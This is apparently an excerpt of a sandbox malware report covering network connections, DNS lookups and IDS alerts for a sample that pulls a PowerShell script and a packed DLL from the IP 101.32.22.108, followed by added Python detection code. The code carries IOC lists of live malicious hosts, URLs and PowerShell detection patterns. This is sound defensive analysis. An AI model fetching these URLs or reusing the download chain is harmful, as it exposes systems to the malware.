Ten of the 46 requests are listed. Only the last row belongs to the sample: PID 4816 fetches 1h.txt by IP literal (101.32.22.108 is also the address dow.601219.xyz resolves to in the DNS section below) and then writes C:\Users\Public\Documents\1h.ps1 (see Dropped files). The POST rows carry no PID because the sandbox did not attribute them to a process; every row except the last is whitelisted Microsoft background traffic.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5944 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1268 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4860 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
1268 | svchost.exe | 2.16.168.124:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
4860 | RUXIMICS.exe | 2.16.168.124:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
1268 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
4860 | RUXIMICS.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
5944 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted

Ten of the 69 connections are listed, all of them Windows background traffic (NetBIOS broadcasts, telemetry, CRL fetches). The sample's own connections, PowerShell to 101.32.22.108:80 (see HTTP requests) and the "unusual port" connection by mmgaserver.exe (PID 1336) flagged in the indicators, are not in this excerpt.

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.78
whitelisted
crl.microsoft.com
  • 2.16.168.124
  • 2.16.168.114
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.181.156
whitelisted
www.660982.xyz
  • 38.147.186.138
unknown
watson.events.data.microsoft.com
  • 13.89.179.12
  • 20.189.173.21
  • 40.69.146.102
  • 104.40.67.196
whitelisted
login.live.com
  • 40.126.31.128
  • 40.126.31.129
  • 20.190.159.71
  • 20.190.159.129
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.4
  • 40.126.31.1
  • 20.190.159.73
  • 20.190.159.2
  • 20.190.159.0
  • 40.126.31.67
whitelisted
nexusrules.officeapps.live.com
  • 52.111.227.13
whitelisted
dow.601219.xyz
  • 101.32.22.108
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

PID | Process | Class | Message
- | - | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0)
4816 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
4816 | powershell.exe | Potentially Bad Traffic | ET INFO PS1 Powershell File Request
4816 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6768 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6768 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6768 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host DLL Request
6768 | powershell.exe | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage
6768 | powershell.exe | Misc activity | ET INFO Packed Executable Download
6768 | powershell.exe | Potential Corporate Privacy Violation | ET INFO PE EXE or DLL Windows file download HTTP

Ten of the 16 alerts are listed ("Potential Corporate Privacy Violation" is the Suricata classtype of the rule, not a separate finding). Read with the process table: PID 4816 fetched 1h.txt, which the PS1 rule recognised as a PowerShell script despite the .txt name, and PID 6768 then requested a DLL from a dotted-quad host and received a packed PE; the only DLL that subsequently appears in the process table is ExecutionHuiOne.dll, loaded by rundll32.exe (PID 2428).
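The Suricata-style alerts above are content checks that can be re-implemented over proxy logs or PCAP-derived HTTP metadata: an IP-literal host, the WindowsPowerShell user-agent, a script or PE delivered under a misleading extension, and a match against the indicators from this report's DNS and HTTP sections. The Python below is an added example, not part of the ANY.RUN report. The IOC lists are taken from this page; the user-agent strings, the response bodies, the ExecutionHuiOne.dll URL path for PID 6768 and the chrome.exe row are constructed for the sample data (the report shows neither response bodies nor the URL of PID 6768's DLL request).

```python
import ipaddress
from dataclasses import dataclass
from urllib.parse import urlsplit

# Network indicators taken from this report's HTTP and DNS sections.
IOC_IPS = {"101.32.22.108", "38.147.186.138"}
IOC_DOMAINS = {"dow.601219.xyz", "www.660982.xyz"}

SCRIPT_EXT = (".ps1", ".psm1", ".bat", ".cmd", ".vbs", ".js", ".hta")
PE_EXT = (".exe", ".dll", ".scr", ".sys")
# Tokens that betray a PowerShell script body served under a harmless extension.
PS_TOKENS = (b"invoke-", b"iex ", b"iex(", b"new-object", b"$env:", b"-join")


@dataclass
class HttpRecord:
    pid: int
    process: str
    method: str
    url: str
    user_agent: str
    body_prefix: bytes = b""   # first bytes of the response body, when captured


def is_dotted_quad(host: str) -> bool:
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        return False


def host_matches_ioc(host: str) -> bool:
    """Exact IP/domain match, or a subdomain of an IOC domain."""
    h = host.lower().rstrip(".")
    return h in IOC_IPS or h in IOC_DOMAINS or any(h.endswith("." + d) for d in IOC_DOMAINS)


def classify(rec: HttpRecord):
    """Return (verdict, hits) for one HTTP request; verdict is benign, suspicious or malicious."""
    parts = urlsplit(rec.url)
    host = (parts.hostname or "").lower()
    path = parts.path.lower()
    ext = path.rsplit(".", 1)[-1] if "." in path else "none"
    body = rec.body_prefix.lower()
    hits = []
    if host_matches_ioc(host):
        hits.append("known IOC host")
    if is_dotted_quad(host):                            # cf. "ET INFO Dotted Quad Host ..." rules
        hits.append("dotted-quad host (no DNS name)")
    if "windowspowershell" in rec.user_agent.lower():   # cf. "Windows Powershell User-Agent Usage"
        hits.append("PowerShell user-agent")
    if path.endswith(SCRIPT_EXT):
        hits.append("script file requested")
    elif any(t in body for t in PS_TOKENS):             # cf. "PS1 Powershell File Request" on 1h.txt
        hits.append(f"PowerShell script body served as .{ext}")
    if body.startswith(b"mz"):                          # MZ header means PE whatever the name says
        hits.append("PE payload in response body")
    elif path.endswith(PE_EXT):
        hits.append("PE file name requested")

    if "known IOC host" in hits or "PE payload in response body" in hits:
        verdict = "malicious"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return verdict, hits


def dns_hits(queries) -> list:
    """Queried names that match the report's domain indicators (for the DNS log side)."""
    return sorted({q for q in queries if host_matches_ioc(q)})


# Sample traffic. Rows marked "from report" reuse the PID, process and URL listed above;
# user-agents and bodies are constructed, as are the rows marked "constructed".
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
SAMPLE_HTTP = [
    HttpRecord(1268, "svchost.exe", "GET",                                 # from report
               "http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl",
               "Microsoft-CryptoAPI/10.0", b"0\x82\x03"),
    HttpRecord(4816, "powershell.exe", "GET",                              # from report (body constructed)
               "http://101.32.22.108/1/1h.txt", PS_UA, b"$wc = New-Object Net.WebClient\r\n"),
    HttpRecord(6768, "powershell.exe", "GET",                              # constructed
               "http://101.32.22.108/1/ExecutionHuiOne.dll", PS_UA, b"MZ\x90\x00\x03\x00\x00\x00"),
    HttpRecord(7777, "chrome.exe", "GET",                                  # constructed, RFC 5737 test address
               "http://203.0.113.10/index.html", "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0",
               b"<!doctype html>"),
]
SAMPLE_DNS = ["settings-win.data.microsoft.com", "dow.601219.xyz", "google.com", "www.660982.xyz"]

if __name__ == "__main__":
    for rec in SAMPLE_HTTP:
        print(rec.pid, rec.process, rec.url, *classify(rec))
    print("DNS IOC hits:", dns_hits(SAMPLE_DNS))
```

The verdict logic is deliberately simple: an IOC host or an MZ-headed body is enough on its own, while the remaining checks only raise a request to suspicious, so a browser fetching a page from a bare IP (the chrome.exe row) is surfaced but not blocked. Content sniffing is what catches 1h.txt, whose name says nothing; the extension checks alone would have missed it.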